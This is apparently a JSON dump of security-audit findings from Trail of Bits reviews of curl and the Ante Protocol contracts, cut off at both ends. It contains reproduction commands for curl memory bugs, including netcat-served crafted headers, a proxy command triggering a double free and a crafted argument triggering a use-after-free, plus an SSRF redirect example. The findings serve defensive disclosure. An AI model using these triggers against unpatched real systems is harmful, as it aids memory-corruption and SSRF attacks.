"https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Several cases were discovered in which possibly user-supplied values are checked against a known secret using non-constant-time comparison. In cases where an attacker can accurately time how long it takes for the application to fail validation of submitted data that he controls, such behavior could leak information about the secret itself, allowing the attacker to brute-force it in linear time. In the example below, credentials are checked via Curl_safecmp() , which is a memory-safe, but not constant-time, wrapper around strcmp() . This is used to determine whether or not to reuse an existing TLS connection. #ifdef USE_TLS_SRP Curl_safecmp(data->username, needle->username) && Curl_safecmp(data->password, needle->password) && (data->authtype == needle->authtype) && #endif Figure 4.1: lib/url.c , lines 148 through 152. Credentials checked using a memory-safe, but not constant-time, wrapper around strcmp() The above is one example out of several cases found, all of which are noted above. Exploit Scenario An application uses a libcurl build with TLS-SRP enabled and allows multiple users to make TLS connections to a remote server. An attacker times how quickly cURL responds to his requests to create a connection, and thereby gradually works out the credentials associated with an existing connection. Eventually, he is able to submit a request with exactly the same SSL conguration such that another users existing connection is reused. Recommendations Short term, introduce a method, e.g. Curl_constcmp() , which does a constant-time comparison of two stringsthat is, it scans both strings exactly once in their entirety. Long term, compare secrets to user-submitted values using only constant-time algorithms.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "5. Tab injection in cookie le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "When libcurl makes an HTTP request, the cookie jar le is overwritten to store the cookies, but the storage format uses tabs to separate key pieces of information. The cookie parsing code for HTTP headers strips the leading and trailing tabs from cookie keys and values, but it does not reject cookies with tabs inside the keys or values. In the snippet of lib/cookie.c below, Curl_cookie_add() parses tab-separated cookie data via strtok_r() and uses a switch-based state machine to interpret specic parts as key information: firstptr = strtok_r(lineptr, \"\\t\" , &tok_buf); /* tokenize it on the TAB */ Figure 5.1: Parsing tab-separated cookie data via strtok_r() Exploit Scenario A webpage returns a Set-Cookie header with a tab character in the cookie name. When a cookie le is saved from cURL for this page, the part of the name before the tab is taken as the key, and the part after the tab is taken as the value. The next time the cookie le is loaded, these two values will be used. % echo \"HTTP/1.1 200 OK\\r\\nSet-Cookie: foo\\tbar=\\r\\n\\r\\n\\r\\n\"|nc -l 8000 & % curl -v -c /tmp/cookies.txt http://localhost:8000 * Trying 127.0.0.1:8000... * Connected to localhost (127.0.0.1) port 8000 (#0) > GET / HTTP/1.1 > Host: localhost:8000 > User-Agent: curl/7.79.1 > Accept: */* * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK * Added cookie foo bar=\"\" for domain localhost, path /, expire 0 < Set-Cookie: foo bar= * no chunk, no close, no size. Assume close to signal end Figure 5.2: Sending a cookie with name foo\\tbar , and no value. % cat /tmp/cookies.txt | tail - localhost FALSE / FALSE 0 foo bar Figure 5.3: Sending a cookie with name foo\\tbar and no value Recommendations Short term, either reject any cookie with a tab in its key (as \\t is not a valid character for cookie keys, according to the relevant RFC), or escape or quote tab characters that appear in cookie keys. Long term, do not assume that external data will follow the intended specication. Always account for the presence of special characters in such inputs.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Standard output/input/error may not be opened ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "The function main_checkfds() is used to ensure that le descriptors 0, 1, and 2 (stdin, stdout, and stderr) are open before curl starts to run. This is necessary to avoid the case wherein, if one of those descriptors fails to open initially, the next network socket opened by cURL may gain an FD number of 0, 1, or 2, resulting in what should be local input/output being received from or sent to a network socket instead. However, pipe errors actually result in the same outcome as success: static void main_checkfds ( void ) { #ifdef HAVE_PIPE int fd[ 2 ] = { STDIN_FILENO, STDIN_FILENO }; while (fd[ 0 ] == STDIN_FILENO || fd[ 0 ] == STDOUT_FILENO || fd[ 0 ] == STDERR_FILENO || fd[ 1 ] == STDIN_FILENO || fd[ 1 ] == STDOUT_FILENO || fd[ 1 ] == STDERR_FILENO) if (pipe(fd) < 0 ) return ; /* Out of handles. This isn't really a big problem now, but will be when we try to create a socket later. */ close(fd[ 0 ]); close(fd[ 1 ]); #endif } Figure 6.1: tool_main.c:83105 , lines 83 through 105 Though the comment notes that an out-of-handles condition would result in a failure later on in the application, there may be cases where this is not truee.g., the maximum number of handles has been reached at the time of this check, but handles are closed between it and the next attempt to create a socket. In such a case, execution might continue as normal, with stdin/out/err being redirected to an unexpected location. Recommendations Short term, use fcntl() to check if stdin/out/err are open. If they are not, exit the program if the pipe function fails. Long term, do not assume that execution will fail later; fail early in cases like these.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Double free when using HTTP proxy with specic protocols ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Using cURL with proxy connection and dict, gopher, LDAP, or telnet protocol triggers a double free vulnerability (gure 7.1). The connect_init function allocates a memory block for a connectdata struct (gure 7.2). After the connection, cURL frees the allocated buer in the conn_free function (gure 7.3), which is freed for the second time in the Curl_free_request_state frees, which uses the Curl_safefree function on elements of the Curl_easy struct (gure 7.4). This double free was also not detected in release builds during our testing the glibc allocator checks may fail to detect such cases on some occasions. The two frees success indicates that future memory allocations made by the program will return the same pointer twice. This may enable exploitation of cURL if the allocated objects contain data controlled by an attacker. Additionally, if this vulnerability also triggers in libcurlwhich we believe it shouldit may enable the exploitation of programs that depend on libcurl. $ nc -l 1337 | echo 'test' & # Imitation of a proxy server using netcat $ curl -x http://test:test@127.0.0.1:1337 dict://127.0.0.1 2069694==ERROR: AddressSanitizer: attempting double-free on 0x617000000780 in thread T0: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf3afe in Curl_free_request_state curl/lib/url.c:2259:3 #2 0x7f1eeeaf3afe in Curl_close curl/lib/url.c:421:3 #3 0x7f1eeea30943 in curl_easy_cleanup curl/lib/easy.c:798:3 #4 0x4e07df in post_per_transfer curl/src/tool_operate.c:656:3 #5 0x4dee58 in serial_transfers curl/src/tool_operate.c:2434:18 #6 0x4dee58 in run_all_transfers curl/src/tool_operate.c:2620:16 #7 0x4dee58 in operate curl/src/tool_operate.c:2732:18 #8 0x4dcf73 in main curl/src/tool_main.c:276:14 #9 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #10 0x41c7cd in _start (curl/src/.libs/curl+0x41c7cd) 0x617000000780 is located 0 bytes inside of 664-byte region [0x617000000780,0x617000000a18) freed by thread T0 here: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf6094 in conn_free curl/lib/url.c:814:3 #2 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684: #3 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #4 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #5 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #6 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #7 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #8 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #9 0x4dcf73 in main curl/src/tool_main.c:276:14 #10 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x495082 in calloc (curl/src/.libs/curl+0x495082) #1 0x7f1eeea6d642 in connect_init curl/lib/http_proxy.c:174:9 #2 0x7f1eeea6d642 in Curl_proxyCONNECT curl/lib/http_proxy.c:1061:14 #3 0x7f1eeea6d1f2 in Curl_proxy_connect curl/lib/http_proxy.c:118:14 #4 0x7f1eeea94c33 in multi_runsingle curl/lib/multi.c:2028:16 #5 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684:14 #6 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #7 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #8 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #9 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #10 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #11 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #12 0x4dcf73 in main curl/src/tool_main.c:276:14 #13 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: double-free (curl/src/.libs/curl+0x494c8d) in free Figure 7.1: Reproducing double free vulnerability with ASAN log 158 static CURLcode connect_init ( struct Curl_easy *data, bool reinit) // (...) 174 s = calloc( 1 , sizeof ( struct http_connect_state )); Figure 7.2: Allocating a block of memory that is freed twice ( curl/lib/http_proxy.c#158174 ) 787 static void conn_free ( struct connectdata *conn) // (...) 814 Curl_safefree(conn->connect_state); Figure 7.3: The conn_free function that frees the http_connect_state struct for HTTP CONNECT ( curl/lib/url.c#787814 ) void Curl_free_request_state ( struct Curl_easy *data) 2257 2258 { 2259 2260 Curl_safefree(data->req.p.http); Curl_safefree(data->req.newurl); Figure 7.4: The Curl_free_request_state function that frees elements in the Curl_easy struct, which leads to a double free vulnerability ( curl/lib/url.c#22572260 ) Exploit Scenario An attacker nds a way to exploit the double free vulnerability described in this nding either in cURL or in a program that uses libcurl and gets remote code execution on the machine from which the cURL code was executed. Recommendations Short term, x the double free vulnerability described in this nding. Long term, expand cURLs unit tests and fuzz tests to cover dierent types of proxies for supported protocols. Also, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the approach presented in the argv-fuzz-inl.h from the AFL++ project. This will force the fuzzer to build an argv pointer array (which points to arguments passed to the cURL) from NULL-delimited standard input. Finally, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or on cURLs manual.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "8. Some ags override previous instances of themselves ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Some cURL ags, when provided multiple times, overrides themselves and eectively use the last ag provided. If a ag makes cURL invocations security options more strict, then accidental overwriting may weaken the desired security. The identied ag with this property is the --crlfile command-line option. It allows users to pass a PEM-formatted certicate revocation list to cURL. --crlfile List that may specify peer certificates that are to be considered revoked. (TLS) Provide a file using PEM format with a Certificate Revocation If this option is used several times, the last one will be used. Example: curl --crlfile rejects.txt https://example.com Added in 7.19.7. Figure 8.1: The description of the --crlfile option Exploit Scenario A user wishes for cURL to reject certicates specied across multiple certicate revocation lists. He unwittingly uses the --crlfile ag multiple times, dropping all but the last-specied list. Requests the user sends with cURL are intercepted by a Man-in-the-Middle attacker, who uses a known-compromised certicate to bypass TLS protections. Recommendations Short term, change the behavior of --crlfile to append new certicates to the revocation list, not to replace those specied earlier. If backwards compatibility prevents this, have cURL issue a warning such as --crlfile specified multiple times, using only . Long term, ensure that behavior, such as how multiple instances of a command-line argument are handled, is consistent throughout the application. Issue a warning when a security-relevant ag is provided multiple times.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "9. Cookies are not stripped after redirect ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "If cookies are passed to cURL via the --cookie ag, they will not be stripped if the target responds with a redirect. RFC 9110 section 15.4, Redirection 3xx , does not specify whether or not cookies should be stripped during a redirect; as such, it may be better to err on the side of caution and strip them by default if the origin changed. The recommended behavior would match the current behavior with cookie jar (i.e., when a server sets a new cookie and requests a redirect) and Authorization header (which is stripped on cross-origin redirects). Recommendations Short term, if backwards compatibility would not prohibit such a change, strip cookies upon a redirect to a dierent origin by default and provide a command-line ag that enables the previous behavior (or extend the --location-trusted ag). Long term, in cases where a specication is ambiguous and practicality allows, always default to the most secure possible interpretation. Extend tests to check for behavior of passing data after redirection.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "10. Use after free while using parallel option and sequences ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Using cURL with parallel option ( -Z ), two consecutive sequences (that end up creating 51 hosts), and an unmatched bracket triggers a use-after-free vulnerability (gure 10.1). The add_parallel_transfers function allocates memory blocks for an error buer; consequently, by default, it allows up to 50 transfers (gure 10.2, line 2228). Then, in the Curl_failf function, it copies errors (e.g., Could not resolve host: q{ ) to appropriate error buers when connections fail (gure 10.3) and frees the memory. For the last sequence ( u~ host), it allocates a memory buer (gure 10.2), frees a buer (gure 10.3), and copies an error ( Could not resolve host: u~ ) to the previously freed memory buer (gure 10.4). $ curl 0 -Z [q-u][u-~] } curl: (7) Failed to connect to 0.0.0.0 port 80 after 0 ms: Connection refused curl: (3) unmatched close brace/bracket in URL position 1: } ^ curl: (6) Could not resolve host: q{ curl: (6) Could not resolve host: q| curl: (6) Could not resolve host: q} curl: (6) Could not resolve host: q~ curl: (6) Could not resolve host: r{ curl: (6) Could not resolve host: r| curl: (6) Could not resolve host: r} curl: (6) Could not resolve host: r~ curl: (6) Could not resolve host: s{ curl: (6) Could not resolve host: s| curl: (6) Could not resolve host: s} curl: (6) Could not resolve host: s~ curl: (6) Could not resolve host: t{ curl: (6) Could not resolve host: t| curl: (6) Could not resolve host: t} curl: (6) Could not resolve host: t~ curl: (6) Could not resolve host: u{ curl: (6) Could not resolve host: u| curl: (6) Could not resolve host: u} curl: (3) unmatched close brace/bracket in URL position 1: } ^ ====2789144==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000004780 at pc 0x7f9b5f94016d bp 0x7fff12d4dbc0 sp 0x7fff12d4d368 WRITE of size #0 0x7f9b5f94016c in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors. cc : 431 #1 0x7f9b5f7ce6f4 in strcpy /usr/ include /x86_64-linux-gnu/bits/string_fortified. h : 90 #2 0x7f9b5f7ce6f4 in Curl_failf /home/scooby/curl/lib/sendf. c : 275 #3 0x7f9b5f78309a in Curl_resolver_error /home/scooby/curl/lib/hostip. c : 1316 #4 0x7f9b5f73cb6f in Curl_resolver_is_resolved /home/scooby/curl/lib/asyn-thread. c : 596 #5 0x7f9b5f7bc77c in multi_runsingle /home/scooby/curl/lib/multi. c : 1979 #6 0x7f9b5f7bf00f in curl_multi_perform /home/scooby/curl/lib/multi. c : 2684 #7 0x55d812f7609e in parallel_transfers /home/scooby/curl/src/tool_operate. c : 2308 #8 0x55d812f7609e in run_all_transfers /home/scooby/curl/src/tool_operate. c : 2618 #9 0x55d812f7609e in operate /home/scooby/curl/src/tool_operate. c : 2732 #10 0x55d812f4ffa8 in main /home/scooby/curl/src/tool_main. c : 276 #11 0x7f9b5f1aa082 in __libc_start_main ../csu/libc- start . c : 308 #12 0x55d812f506cd in _start (/usr/ local /bin/curl+ 0x316cd ) 0x611000004780 is located 0 bytes inside of 256-byte region [0x611000004780,0x611000004880) freed by thread T0 here: #0 0x7f9b5f9b140f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x55d812f75682 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2251 previously allocated by thread T0 here: #0 0x7f9b5f9b1808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x55d812f75589 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2228 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/asan/asan_interceptors.cc:431 in __interceptor_strcpy Shadow bytes around the buggy address: 0x0c227fff88a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff88d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa =>0x0c227fff88f0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8910: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff8920: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8930: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c227fff8940: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Heap left redzone: fa Freed heap region: fd ==2789144==ABORTING Figure 10.1: Reproducing use-after-free vulnerability with ASAN log 2192 static CURLcode add_parallel_transfers ( struct GlobalConfig *global, CURLM *multi, CURLSH *share, bool *morep, bool *addedp) 2197 { // (...) 2210 for (per = transfers; per && (all_added < global->parallel_max); per = per->next) { 2227 2228 // (...) 2249 if (!errorbuf) { errorbuf = malloc(CURL_ERROR_SIZE); result = create_transfer(global, share, &getadded); 2250 2251 2252 2253 if (result) { free(errorbuf); return result; } Figure 10.2: The add_parallel_transfers function ( curl/src/tool_operate.c#21922253 ) 264 265 { void Curl_failf ( struct Curl_easy *data, const char *fmt, ...) // (...) 275 strcpy(data->set.errorbuffer, error); Figure 10.3: The Curl_failf function that copies appropriate error to the error buer ( curl/lib/sendf.c#264275 ) Exploit Scenario An administrator sets up a service that calls cURL, where some of the cURL command-line arguments are provided from external, untrusted input. An attacker manipulates the input to exploit the use-after-free bug to run arbitrary code on the machine that runs cURL. Recommendations Short term, x the use-after-free vulnerability described in this nding. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the argv-fuzz-inl.h from the AFL++ project to build argv from stdin in the cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURLs manual.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "11. Unused memory blocks are not freed resulting in memory leaks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "For specic commands (gure 11.1, 11.2, 11.3), cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. $ curl 0 -Z 0 -Tz 0 curl: Can 't open ' z '! curl: try ' curl --help ' or ' curl --manual' for more information curl: ( 26 ) Failed to open/read local data from file/application ============= 2798000 ==ERROR: LeakSanitizer: detected memory leaks Direct leak of 4848 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eba06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153 #1 0x561bb1d1dc9f in glob_url /home/scooby/curl/src/tool_urlglob.c:459 Indirect leak of 8 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e06c in glob_fixed /home/scooby/curl/src/tool_urlglob.c:48 #2 0x561bb1d1e06c in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e06c in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e0b0 in glob_fixed /home/scooby/curl/src/tool_urlglob.c:53 #2 0x561bb1d1e0b0 in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e0b0 in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1dc6a in glob_url /home/scooby/curl/src/tool_urlglob.c:454 Figure 11.1: Reproducing memory leaks vulnerability in the tool_urlglob.c le with LeakSanitizer log. $ curl 00 --cu 00 curl: ( 7 ) Failed to connect to 0 .0.0.0 port 80 after 0 ms: Connection refused ============= 2798691 ==ERROR: LeakSanitizer: detected memory leaks Direct leak of 3 byte(s) in 1 object(s) allocated from: #0 0x7fbc6811b3ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x56412ed047ee in getparameter /home/scooby/curl/src/tool_getparam.c:1885 SUMMARY: AddressSanitizer: 3 byte(s) leaked in 1 allocation(s). Figure 11.2: Reproducing a memory leak vulnerability in the tool_getparam.c le with LeakSanitizer log $ curl --proto = 0 --proto = 0 Warning: unrecognized protocol '0' Warning: unrecognized protocol '0' curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information ================================================================= == 2799783 ==ERROR: LeakSanitizer: detected memory leaks Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x7f90391803ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x55e405955ab7 in proto2num /home/scooby/curl/src/tool_paramhlp.c:385 SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s). Figure 11.3: Reproducing a memory leak vulnerability in the tool_paramhlp.c le with LeakSanitizer log Exploit Scenario An attacker nds a way to allocate extensive lots of memory on the local machine, which leads to the overconsumption of resources and a denial-of-service attack. Recommendations Short term, x memory leaks described in this nding by freeing memory blocks that are no longer needed. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the argv-fuzz-inl.h from the AFL++ project to build argv from stdin in the cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURLs manual.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "12. Referer header is generated in insecure manner ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "The cURL automatically sets the referer header for HTTP redirects when provided with the --referer ;auto ag. The header set contains the entire original URL except for the user-password fragment. The URL includes query parameters, which is against current best practices for handling the referer , which say to default to the strict-origin-when-cross-origin option. The option instructs clients to send only the URLs origin for cross-origin redirect, and not to send the header to less secure destinations (e.g., when redirecting from HTTPS to HTTP protocol). Exploit Scenario An user uses cURL to send a request to a server that requires multi-step authorization. He provides the authorization token as a query parameter and enables redirects with --location ag. Because of the server misconguration, a 302 redirect response with an incorrect Location header that points to a third-party domain is sent back to the cURL. The cURL requests the third-party domain, leaking the authorization token via the referer header. Recommendations Short term, send only the origin instead of the whole URL on cross-origin requests in the referer header. Consider not sending the header on redirects downgrading the security level. Additionally, consider implementing support for the Referrer-Policy response header. Alternatively, introduce a new ag that would allow users to set the desired referrer policy manually. Long term, review response headers that change behavior of HTTP redirects and ensure either that they are supported by the cURL or that secure defaults are implemented. References Feature: Referrer Policy: Default to strict-origin-when-cross-origin", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "13. Redirect to localhost and local network is possible (Server-side request forgery like) ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "When redirects are enabled with cURL (i.e., the --location ag is provided), then a server may redirect a request to an arbitrary endpoint, and the cURL will issue a request to it. This gives requested servers partial access to cURLs users local networks. The issue is similar to the Server-Side Request Forgery (SSRF) attack vector, but in the context of the client application. Exploit Scenario An user sends a request using cURL to a malicious server using the --location ag. The server responds with a 302 redirect to http://192.168.0.1:1080?malicious=data endpoint, accessing the user's router admin panel. Recommendations Short term, add a warning about this attack vector in the --location ag documentation. Long term, consider disallowing redirects to private networks and loopback interface by either introducing a new ag that would disable the restriction or extending the --location-trusted ag functionality.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "14. URL parsing from redirect is incorrect when no path separator is provided ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "When cURL parses a URL from the Location header for an HTTP redirect and the URL does not contain a path separator (/), the cURL incorrectly duplicates query strings (i.e., data after the question mark) and fragments (data after cross). The cURL correctly parses similar URLs when they are provided directly in the command line. This behavior indicates that dierent parsers are used for direct URLs and URLs from redirects, which may lead to further bugs. $ curl -v -L 'http://local.test?redirect=http://local.test:80?-123' * Trying 127 .0.0.1:80... * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET /?redirect=http://local.test:80?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test:80?-123 < Date: Mon, 10 Oct 2022 14 :53:46 GMT < Connection: keep-alive < Keep-Alive: timeout = 5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test:80/?-123?-123' * Found bundle for host: 0x6000039287b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET /?-123?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14 :53: < Connection: keep-alive < Keep-Alive: timeout = 5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.1: Example logging output from cURL, presenting the bug in parsing URLs from the Location header, with port and query parameters $ curl -v -L 'http://local.test?redirect=http://local.test%23-123' * Trying 127 .0.0.1:80... * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET /?redirect=http://local.test%23-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test#-123 < Date: Mon, 10 Oct 2022 14 :56:05 GMT < Connection: keep-alive < Keep-Alive: timeout = 5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test/#-123#-123' * Found bundle for host: 0x6000003f47b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET / HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14 :56:05 GMT < Connection: keep-alive < Keep-Alive: timeout = 5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.2: Example logging output from cURL, presenting the bug in parsing URLs from Location header, without port and with fragment Exploit Scenario A user of cURL accesses data from a server. The server redirects cURL to another endpoint. cURL incorrectly duplicates the query string in the new request. The other endpoint uses the incorrect data, which negatively aects the user. Recommendations Short term, x the parsing bug in the Location header parser. Long term, use a single, centralized API for URL parsing in the whole cURL codebase. Expand tests with checks of parsing of redirect responses.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "1. AntePoolFactory does not validate create2 return addresses ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "The AntePoolFactory uses the create2 instruction to deploy an AntePool and then initializes it with an already-deployed AnteTest address. However, the AntePoolFactory does not validate the address returned by create2, which will be the zero address if the deployment operation fails. bytes memory bytecode = type(AntePool).creationCode; bytes32 salt = keccak256(abi.encodePacked(testAddr)); assembly { testPool := create2(0, add(bytecode, 0x20), mload(bytecode), salt) } poolMap[testAddr] = testPool; allPools.push(testPool); AntePool(testPool).initialize(anteTest); emit AntePoolCreated(testAddr, testPool); Figure 1.1: contracts/AntePoolFactory.sol#L35-L47 This lack of validation does not currently pose a problem, because the simplicity of AntePool contracts helps prevent deployment failures (and thus the return of the zero address). However, deployment issues could become more likely in future iterations of the Ante Protocol. Recommendations Short term, have the AntePoolFactory check the address returned by the create2 operation against the zero address. Long term, ensure that the results of operations that return a zero address in the event of a failure (such as create2 and ecrecover operations) are validated appropriately.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "2. Events emitted during critical operations omit certain details ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "Events are generally emitted for all critical state-changing operations within the system. However, the AntePoolCreated event emitted by the AntePoolFactory does not capture the address of the msg.sender that deployed the AntePool. This information would help provide a more complete audit trail in the event of an attack, as the msg.sender often refers to the externally owned account that sent the transaction but could instead refer to an intermediate smart contract address. emit AntePoolCreated(testAddr, testPool); Figure 2.1: contracts/AntePoolFactory.sol#L47 Additionally, consider having the AntePool.updateDecay method emit an event with the pool share parameters used in decay calculations. Recommendations Short term, capture the msg.sender in the AntePoolFactory.AntePoolCreated event, and have AntePool.updateDecay emit an event that includes the relevant decay calculation parameters. Long term, ensure critical state-changing operations trigger events sucient to form an audit trail in the event of a system failure. Events should capture relevant parameters to help auditors determine the cause of failure. 3. Insu\u0000cient gas can cause AnteTests to produce false positives Severity: High Diculty: High Type: Data Validation Finding ID: TOB-ANTE-3 Target: contracts/AntePool.sol", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "4. Looping over an array of unbounded size can cause a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", + "body": "If an AnteTest fails, the _checkTestNoRevert function will return false, causing the checkTest function to call _calculateChallengerEligibility to compute eligibleAmount; this value is the total stake of the eligible challengers and is used to calculate the proportion of _remainingStake owed to each challenger. To calculate eligibleAmount, the _calculateChallengerEligibility function loops through an unbounded array of challenger addresses. When the number of challengers is large, the function will consume a large quantity of gas in this operation. function _calculateChallengerEligibility() internal { uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY); for (uint256 i = 0; i < challengers.addresses.length; i++) { address challenger = challengers.addresses[i]; if (eligibilityInfo.lastStakedBlock[challenger] < 